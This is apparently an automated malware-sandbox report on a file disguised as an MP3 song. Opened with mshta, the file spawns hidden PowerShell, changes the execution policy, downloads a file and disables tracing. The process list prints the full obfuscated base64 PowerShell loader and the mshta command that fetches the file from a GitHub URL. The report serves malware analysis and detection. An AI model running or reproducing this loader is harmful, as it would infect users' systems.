File name:

2.mp3

Full analysis: https://app.any.run/tasks/7d25da7a-1456-4a36-b405-62ec87177da0
Verdict: Malicious activity
Analysis date: March 23, 2025, 16:16:36
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: audio/mpeg
File info: Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo
MD5:

9A94680A9CD61602DFA3B1AD8EB041E2

SHA1:

F7DFDDAAB390F19215BC0A0527BBCA842E81FB26

SHA256:

02D5A5447B038192F5CBEA326C1F5D27CB009272EC6B83B248F9525A310F84F8

SSDEEP:

98304:YhYxDvqOI041rnPqArMSNJqVIxRNSVdBdlrNjiFsI4U9JhTVL/ycNhcV5PrV66xD:N6j5bkXuKiDa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy

      • mshta.exe (PID: 680)
    • Changes powershell execution policy (Unrestricted)

      • powershell.exe (PID: 6816)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7348)
  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 6816)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 680)
      • powershell.exe (PID: 6816)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 6816)
    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 680)
      • powershell.exe (PID: 6816)
    • Base64-obfuscated command line is found

      • mshta.exe (PID: 680)
    • BASE64 encoded PowerShell command has been detected

      • mshta.exe (PID: 680)
    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 6816)
    • Reads security settings of Internet Explorer

      • ShellExperienceHost.exe (PID: 496)
  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 680)
      • mshta.exe (PID: 7328)
    • Checks proxy server information

      • mshta.exe (PID: 680)
      • powershell.exe (PID: 7348)
      • BackgroundTransferHost.exe (PID: 7944)
      • slui.exe (PID: 1184)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6816)
    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 6816)
    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 7944)
      • BackgroundTransferHost.exe (PID: 8108)
      • BackgroundTransferHost.exe (PID: 6108)
      • BackgroundTransferHost.exe (PID: 7712)
      • BackgroundTransferHost.exe (PID: 728)
    • Reads the software policy settings

      • BackgroundTransferHost.exe (PID: 7944)
      • slui.exe (PID: 6944)
      • slui.exe (PID: 1184)
    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 7944)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7348)
    • Manual execution by a user

      • cmd.exe (PID: 7716)
    • Checks supported languages

      • ShellExperienceHost.exe (PID: 496)
    • Disables trace logs

      • powershell.exe (PID: 7348)
    • Reads the computer name

      • ShellExperienceHost.exe (PID: 496)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.mp3 | LAME encoded MP3 audio (ID3 v2.x tag) (62.5)
.mp3 | MP3 audio (ID3 v2.x tag) (37.5)

EXIF

MPEG

MPEGAudioVersion: 1
AudioLayer: 3
AudioBitrate: 128 kbps
SampleRate: 44100
ChannelMode: Joint Stereo
MSStereo: On
IntensityStereo: Off
CopyrightFlag: -
OriginalMedia:
Emphasis: None
VBRFrames: 11562
VBRBytes: 6328169
VBRScale: 80
Encoder: LAME3.99r
LameVBRQuality: 2
LameQuality: -
LameMethod: VBR (new/mtrh)
LameLowPassFilter: 18.5 kHz
LameBitrate: 32 kbps
LameStereoMode: Joint Stereo

ID3

Title: Doppleganger (feat.A.U.R.C)
Artist: Tab
Track: 1
RecordingTime: 2021
Genre: alternativerock
Composer: Tab
PublisherURL: http://www.jamendo.com
Publisher: http://www.jamendo.com
UserDefinedText: (Tagging time) 2021-09-15T12:37:19
EncodedBy: Jamendo:http://www.jamendo.com| LAME
SourceURL: http://www.jamendo.com/en/album/453476
Comment: http://www.jamendo.com cc_standard
FileURL: http://www.jamendo.com/en/track/1882560
ArtistURL: http://www.jamendo.com/en/artist/348835
CopyrightURL: http://creativecommons.org/licenses/by-nc-nd/3.0/
Copyright: http://creativecommons.org/licenses/by-nc-nd/3.0/
Album: -
Year: 2021

Composite

DateTimeOriginal: 2021
AudioBitrate: 168 kbps
Duration: 0:05:02 (approx)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
154
Monitored processes
17
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start mshta.exe sppextcomobj.exe no specs slui.exe powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs cmd.exe no specs conhost.exe no specs slui.exe mshta.exe no specs shellexperiencehost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
496"C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mcaC:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Shell Experience Host
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\wincorlib.dll
680"C:\WINDOWS\system32\mshta.exe" https://github.com/abunaj3/abjjd/releases/download/2/2.mp3C:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
728"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
1184C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
4880C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
5556\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6108"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
6816"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -nop -ep un -E JABCAFAATABQAFYAIAA9ACAAJwA2ADkANgA1ADcAOAA1ADMANwA0ADYAMQA3ADIANwA0ADIARAA1ADAANwAyADYARgA2ADMANgA1ADcAMwA3ADMAMgAwADIAMgAyADQANgA1ADYARQA3ADYAMwBBADUANwA0ADkANABFADQANAA0ADkANQAyADUAQwA1ADMANwA5ADcAMwA1ADcANABGADUANwAzADYAMwA0ADUAQwA1ADcANgA5ADYARQA2ADQANgBGADcANwA3ADMANQAwADYARgA3ADcANgA1ADcAMgA1ADMANgA4ADYANQA2AEMANgBDADUAQwA3ADYAMwAxADIARQAzADAANQBDADcAMAA2AEYANwA3ADYANQA3ADIANwAzADYAOAA2ADUANgBDADYAQwAyAEUANgA1ADcAOAA2ADUAMgAyADIAMAAyAEQANQA3ADYAOQA2AEUANgA0ADYARgA3ADcANQAzADcANAA3ADkANgBDADYANQAyADAANAA4ADYAOQA2ADQANgA0ADYANQA2AEUAMgAwADIARAA0ADEANwAyADYANwA3ADUANgBEADYANQA2AEUANwA0ADQAQwA2ADkANwAzADcANAAyADAAMgA3ADIARAA0AEUANgBGADUAMAA3ADIANgBGADYANgA2ADkANgBDADYANQAyADcAMgBDADIANwAyAEQANAA1ADcAOAA2ADUANgAzADcANQA3ADQANgA5ADYARgA2AEUANQAwADYARgA2AEMANgA5ADYAMwA3ADkAMgA3ADIAQwAyADcANQA1ADYARQA3ADIANgA1ADcAMwA3ADQANwAyADYAOQA2ADMANwA0ADYANQA2ADQAMgA3ADIAQwAyADcAMgBEADQAMwA2AEYANgBEADYARAA2ADEANgBFADYANAAyADcAMgBDADIANwA1ADMANQA2ADIAMAA3ADAANgA2ADIAMAAyADgAMgA4ADIAOAAyADgANQBCADQARQA2ADUANwA0ADIARQA1ADcANgA1ADYAMgA0ADMANgBDADYAOQA2ADUANgBFADcANAA1AEQAMwBBADMAQQA0AEUANgA1ADcANwAyADgAMgA5ADcAQwA0ADcANgA1ADcANAAyAEQANABEADYANQA2AEQANgAyADYANQA3ADIAMgA5ADcAQwA1ADcANgA4ADYANQA3ADIANgA1ADIARAA0AEYANgAyADYAQQA2ADUANgAzADcANAA3AEIAMgA0ADUARgAyAEUANABFADYAMQA2AEQANgA1ADIAMAAyAEQANgAzADYAQwA2ADkANgBCADYANQAyADcAMgA3ADIAQQA3ADcANgBFADIAQQA2ADQAMgBBADYANwAyADcAMgA3ADcARAAyADkAMgBFADQARQA2ADEANgBEADYANQAyADkAMgA5ADMAQgA1ADMANQA2ADIAMAA0AEEAMwA1ADIAMAAyADcAMgA3ADYAOAA3ADQANwA0ADcAMAA3ADMAMwBBADIARgAyAEYANgA5ADIARQA3ADkANgA1ADYAMQA2ADkANgBGADIARQA3ADMANgA4ADYARgA3ADAAMgBGADYAMQAzADUAMwA1ADYANgA2ADUANgA1ADMANQAzADEANgA2ADYANQAzADQAMwA2ADMAOQA2ADIAMwA3ADYANQA2ADQAMwA0ADYANgAzADIAMwAzADYANQA2ADYAMwAzADMANwAzADUAMwAzADYAMgAzADMAMwA4ADMAMAA2ADYANgAyADMANQAzADQAMwA4ADYANAAzADYAMwA1ADYANgAzADQAMwAwADMAMwAzADAAMwA2ADMAOQAzADYAMwAyADIARQA3ADAANwAwADcANAA2AEQAMgA3ADIANwAzAEIANQAzADQAOQAyADAANQA2ADYAMQA3ADIANgA5ADYAMQA2ADIANgBDADYANQAzAEEANQBDADQARgA2AEEAMgAwADIAOAA1AEIANABFADYANQA3ADQAMgBFADUANwA2ADUANgAyADQAMwA2AEMANgA5ADYANQA2AEUANwA0ADUARAAzAEEAMwBBADQARQA2ADUANwA3ADIAOAAyADkAMgA5ADMAQgAyAEUAMgA4ADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMgAwADQANQAyAEEANgBGADYARQA3ADQANgA1ADIAQQAyADAAMgBEADUANgA2ADEAMgA5ADIARQA0ADkANgBFADcANgA2AEYANgBCADYANQA0ADMANgBGADYARAA2AEQANgAxADYARQA2ADQAMgBFADQANwA2ADUANwA0ADQAMwA2AEYANgBEADYARAA2ADEANgBFADYANAAyADgAMgA4ADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMgAwADQANQAyAEEANgBGADYARQA3ADQANgA1ADIAQQAyADAAMgBEADUANgA2ADEAMgA5ADIARQA0ADkANgBFADcANgA2AEYANgBCADYANQA0ADMANgBGADYARAA2AEQANgAxADYARQA2ADQAMgBFADQANwA2ADUANwA0ADQAMwA2AEYANgBEADYARAA2ADEANgBFADYANAA0AEUANgAxADYARAA2ADUAMgA4ADIANwAyADcANAA5ADYARQAyAEEANwAzADcAMwA2ADkAMgBBADIANwAyADcAMgBDADIANAA1ADQANQAyADUANQA0ADUAMgBDADIANAA1ADQANQAyADUANQA0ADUAMgA5ADIAQwA1AEIANQAzADcAOQA3ADMANwA0ADYANQA2AEQAMgBFADQARAA2ADEANgBFADYAMQA2ADcANgA1ADYARAA2ADUANgBFADcANAAyAEUANAAxADcANQA3ADQANgBGADYARAA2ADEANwA0ADYAOQA2AEYANgBFADIARQA0ADMANgBGADYARAA2AEQANgAxADYARQA2ADQANQA0ADcAOQA3ADAANgA1ADcAMwA1AEQAMwBBADMAQQA0ADMANgBEADYANAA2AEMANgA1ADcANAAyADkAMgA4ADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMgAwADQARgA2AEEAMgA5ADIARQA1ADYANgAxADYAQwA3ADUANgA1ADIARQAyADgAMgA4ADQANwA0ADMANAA5ADIAMAA1ADYANgAxADcAMgA2ADkANgAxADYAMgA2AEMANgA1ADMAQQA3ADAANgA2ADIAOQAyAEUANQA2ADYAMQA2AEMANwA1ADYANQAyADkAMgA4ADIAOAA0ADcANAAzADQAOQAyADAANQA2ADYAMQA3ADIANgA5ADYAMQA2ADIANgBDADYANQAzAEEANQBDADQAQQAzADUAMgA5ADIARQA1ADYANgAxADYAQwA3ADUANgA1ADIAOQAyADcAMwBCADIANAA2AEEANgAyADQANwA2AEYANABGADUANQA1ADAANABGADIAMAAzAEQAMgAwADIANAA2ADUANgBFADcANgAzAEEANAAxADcAMAA3ADAANAA0ADYAMQA3ADQANgAxADMAQgA2ADYANwA1ADYARQA2ADMANwA0ADYAOQA2AEYANgBFADIAMAA1ADgANQA1ADcAQQA0ADQANgA0ADQAQgAyADgAMgA0ADUANQA2ADkANQA0ADYANwA0AEYANAAzADUAMAA0ADgANQBBADIAQwAyADAAMgA0ADcAMgA2ADMANwA5ADcAQQAyADkANwBCADYAMwA3ADUANwAyADYAQwAyADAAMgA0ADUANQA2ADkANQA0ADYANwA0AEYANAAzADUAMAA0ADgANQBBADIAMAAyAEQANgBGADIAMAAyADQANwAyADYAMwA3ADkANwBBADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANQBBADcAMwA2ADgANwBBADYANwA0ADYANwA1ADYARQAyADgAMgA5ADcAQgA2ADYANwA1ADYARQA2ADMANwA0ADYAOQA2AEYANgBFADIAMAA1ADYANgBGADYANQA1ADAAMgA4ADIANAA0AEMANgBEADUAMgA0ADQANwA0ADYARQA0ADcANgAzADYAMwAyADkANwBCADYAOQA2ADYAMgA4ADIAMQAyADgANQA0ADYANQA3ADMANwA0ADIARAA1ADAANgAxADcANAA2ADgAMgAwADIARAA1ADAANgAxADcANAA2ADgAMgAwADIANAA3ADIANgAzADcAOQA3AEEAMgA5ADIAOQA3AEIANQA4ADUANQA3AEEANAA0ADYANAA0AEIAMgAwADIANAA0AEMANgBEADUAMgA0ADQANwA0ADYARQA0ADcANgAzADYAMwAyADAAMgA0ADcAMgA2ADMANwA5ADcAQQA3AEQANwBEADcARAA1AEEANwAzADYAOAA3AEEANgA3ADQANgA3ADUANgBFADMAQgAnACAALQBzAHAAbABpAHQAIAAnACgALgB7ADIAfQApACcAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwB9ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAWwBjAGgAYQByAF0AKABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsADEANgApACkAfQA7ACQAQgBQAEwAUABWACAAPQAgACQAQgBQAEwAUABWACAALQBqAG8AaQBuACAAJwAnADsAIAAmACAAJABCAFAATABQAFYALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAzACkAIAAkAEIAUABMAFAAVgAuAFMAdQBiAHMAdAByAGkAbgBnACgAMwApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6944"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7328mshta.exe 2.mp3C:\Windows\System32\mshta.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
Total events
15 122
Read events
15 088
Write events
34
Delete events
0

Modification events

(PID) Process:(680) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(680) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(680) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7348) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7348) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7348) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(7348) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(7348) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(7348) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(7348) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
0
Suspicious files
19
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
680mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\2[1].mp3
MD5:
SHA256:
7944BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D
MD5:
SHA256:
7944BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\69c020c5-dbde-46cc-bda5-185a4723a8a4.down_data
MD5:
SHA256:
680mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D0E1C4B6144E7ECAB3F020E4A19EFC29_B5F77004C894173A10E3A199871D2D90binary
MD5:33A7239237D908C91131DBE7A196F849
SHA256:F9E05758E171CB555F10CCF8ADF7384C73D3A811D4BCF79B6F12D295C2A543BE
6816powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9CFN1CDD9QZAZ5LF4YPA.tempbinary
MD5:606EBE2761294DCF3044C62BE993ECBD
SHA256:B3FDFB4FFF22A8E731D5215C8DC999D34CDE82DE76A0786236A598EC17BDC33D
680mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_89854CA6A0F0936A4D2ECA78845CEA25binary
MD5:0C3606B32905A6B2D11C4BDAC46382C3
SHA256:34487AB4E4FABAB72200963BE678C14492FC1BAB3CA5B4A289FCB8D63B5CAA45
680mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D9CA54E0FA212456E1DB00704A97658Ebinary
MD5:892EB1F83F7147E3A14CF99BE39ECC2D
SHA256:74AD0250D84B271AD709D6EB5D84FD841DC7BE7E1917F20E18F038F069D1F316
680mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D0E1C4B6144E7ECAB3F020E4A19EFC29_B5F77004C894173A10E3A199871D2D90binary
MD5:55631512FAD9C98F8696151D0792EA69
SHA256:168AF1A423D5D16548601867E03129B57C8C8A05580C6C8D0E827D95B042FF6B
680mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D9CA54E0FA212456E1DB00704A97658Ebinary
MD5:ED254B67B485CFE12995BE41B95BA8BC
SHA256:0C869A2845054F06EBCACFB2D42B3BFE7C8A36F9A815BD242D30787D310F3FAC
680mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711Ebinary
MD5:A21710DD02E243D2FDE53351E28D934C
SHA256:109CAF868EBF1FFA58313256542E0FE3A7955E49820A3A87F560B3C5EB7D7F75
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
37
DNS requests
24
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.162:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
unknown
GET
200
23.48.23.162:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
unknown
680
mshta.exe
GET
200
104.18.38.233:80
http://ocsp.usertrust.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSr83eyJy3njhjVpn5bEpfc6MXawQQUOuEJhtTPGcKWdnRJdtzgNcZjY5oCEQDzZE5rbgBQI34JRr174fUd
unknown
binary
978 b
unknown
680
mshta.exe
GET
200
104.18.38.233:80
http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEFZnHQTqT5lMbxCBR1nSdZQ%3D
unknown
binary
1.42 Kb
unknown
680
mshta.exe
GET
200
104.18.38.233:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D
unknown
binary
2.18 Kb
unknown
680
mshta.exe
GET
200
172.64.149.23:80
http://ocsp.sectigo.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTPlNxcMEqnlIVyH5VuZ4lawhZX3QQU9oUKOxGG4QR9DqoLLNLuzGR7e64CEQCrZoa1YnvoBZaCEzAShkn1
US
binary
283 b
unknown
680
mshta.exe
GET
200
104.18.38.233:80
http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D
unknown
binary
1.42 Kb
unknown
6544
svchost.exe
GET
200
23.63.118.230:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
DE
471 b
unknown
7944
BackgroundTransferHost.exe
GET
200
23.63.118.230:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
DE
313 b
unknown
6112
backgroundTaskHost.exe
GET
200
23.63.118.230:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
DE
binary
471 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
unknown
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:138
unknown
23.48.23.162:80
crl.microsoft.com
Akamai International B.V.
DE
unknown
5496
MoUsoCoreWorker.exe
23.48.23.162:80
crl.microsoft.com
Akamai International B.V.
DE
unknown
680
mshta.exe
140.82.121.4:443
github.com
GITHUB
US
unknown
